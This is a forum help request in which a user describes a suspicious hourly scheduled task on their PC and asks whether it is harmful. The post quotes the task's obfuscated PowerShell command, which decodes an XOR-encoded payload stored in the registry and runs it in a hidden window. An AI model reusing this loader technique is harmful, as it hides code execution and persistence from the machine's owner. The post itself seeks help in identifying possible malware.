Help identify suspicious tasks

  • Thread starter Jatinder Singh Ss
  • Start date

Jatinder Singh Ss

i have noticed command prompt to appear and disappear instantly after 1-2 hours of startup then i checked my task scheduler and found this weird task named "t2PI3Rtb" which is tasked to run this script every 59 mins after user login location = \Microsoft\Windows\Management\Provisioning\t2Pi3script = /c EcHo iex "ICM ([ScrIptblOck]::creaTE([sTRIng]::JOiN('', ((Get-itemPrOpeRty -pAth 'hklm:\sOftWaRE\dEFauLTuserenVIRoNmEntt2pI3r').'t2PI3RtB' | % { [cHAr](`$_ -BxoR 187) }))))" | PowErsHELl -WInDOwstyLE hIDDeNanyone knows if it is harmful or not?

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